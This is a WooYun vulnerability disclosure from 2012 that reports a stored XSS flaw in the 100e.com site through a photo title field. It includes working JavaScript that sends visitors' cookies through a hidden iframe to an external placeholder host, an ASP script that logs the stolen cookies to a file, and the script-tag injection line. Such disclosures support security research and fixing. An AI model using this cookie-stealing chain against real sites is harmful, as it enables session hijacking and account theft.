漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-013059
漏洞标题:100e一百易 储存型XSS
相关厂商:100e.com
漏洞作者: GuoKer(ZhuLiu)
提交时间:2012-10-06 17:28
修复时间:2012-11-20 17:29
公开时间:2012-11-20 17:29
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-10-06: 细节已通知厂商并且等待厂商处理中
2012-10-08: 厂商已经确认,细节仅向厂商公开
2012-10-18: 细节向核心白帽子及相关领域专家公开
2012-10-28: 细节向普通白帽子公开
2012-11-07: 细节向实习白帽子公开
2012-11-20: 细节向公众公开
简要描述:
http://www.100e.com/ 进入首页即可触发XSS 测试可以无声无息的盗取了cookie ,应该还可以融虫吧,表示没试过 PS:好久没上乌云了......
详细说明:
利用:
在个人管理里面选择上传照片 然后照片随便 标题就写 XSS代码 这次测试的是 盗取 cookie
JS代码
var str=escape(window.location.pathname);
cv=escape(document.cookie);
function f()
{
ifm=document.createElement("IFRAME");
document.body.appendChild(ifm);
ifm.width=0;
ifm.height=0;
ifm.src="http://www.xxxx.com/1.asp?s="+str+"|"+cv;
}
setTimeout(f,"1000");
ASP代码
<%
s=request("s")
if s <> "" then
set fso=Server.CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(server.mappath("1.txt"),8,true)
.writeline s
.close
End with
end if
%>
触发后会在当前目录生成1.txt并把截取到的cookie放进去
然后在照片标题处写 <script src=http://xxxxxxxxx.com/1.js>
保存
这时再打开首页 会和往常一样正常,不过你的cookie已经被截取了,发往了某网站空间里面的1.txt文件里
漏洞证明:
修复方案:
过滤一下关键字
版权声明:转载请注明来源 GuoKer(ZhuLiu)@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2012-10-08 09:05
厂商回复:
谢谢guoker提醒
最新状态:
暂无